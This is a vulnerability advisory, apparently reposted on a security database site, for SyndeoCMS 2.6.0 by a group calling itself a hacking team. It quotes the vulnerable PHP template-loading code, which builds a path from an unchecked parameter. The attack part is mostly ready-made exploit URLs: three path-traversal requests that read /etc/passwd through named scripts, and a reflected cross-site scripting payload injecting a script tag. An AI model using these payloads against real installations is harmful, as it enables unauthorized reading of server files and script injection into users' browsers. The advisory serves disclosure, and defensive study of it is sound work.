SyndeoCMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities

2008.12.01
Risk: Low
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 4/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

=========================================================== SyndeoCMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities =========================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 10 June 2008 SITE : www.citec.us ##################################################### APPLICATION : SyndeoCMS VERSION : 2.6.0 (Lastest Version) DOWNLOAD : http://downloads.sourceforge.net/syndeocms ##################################################### ---LFI--- ################################################################# Vulnerable Code: if (IsSet ($_GET['template'])) { $template_path = ...; $filename = $template_path . "/" . $_GET['template']; if (file_exists($filename)) { $handle = fopen($filename, "r"); $content = fread($handle, filesize($filename)); fclose($handle); } } ################################################################# Vulnerable File: [+] starnet/editors/fckeditor/studenteditor.php [+] starnet/modules/sn_news/edit_content.php [+] starnet/modules/sn_newsletter/edit_content.php Exploit: [+] http://[target]/[path]/starnet/editors/fckeditor/studenteditor.php?template=../../../../../../../../../etc/passwd [+] http://[target]/[path]/starnet/index.php?option=modulemanager&module=16&modoption=edit_article&cat_id=1&article_id=0&template=../../../../../../../../../../../../../etc/passwd [+] http://[target]/[path]/starnet/index.php?option=modulemanager&module=17&modoption=edit_newsletter&newsletter_id=1&edition=1&template=../../../../../../../../../../../../../etc/passwd Note: - the first link requires pupil session (normal student session) - the second link and the third link require admin session ---XSS--- [+] index.php Example: http://[target]/[path]/index.php?page=1&section="><script>alert(111);</script> ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## update: see: http://www.syndeocms.org/forum/index.php?topic=1788.0

Referencje:

http://secunia.com/advisories/30602


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top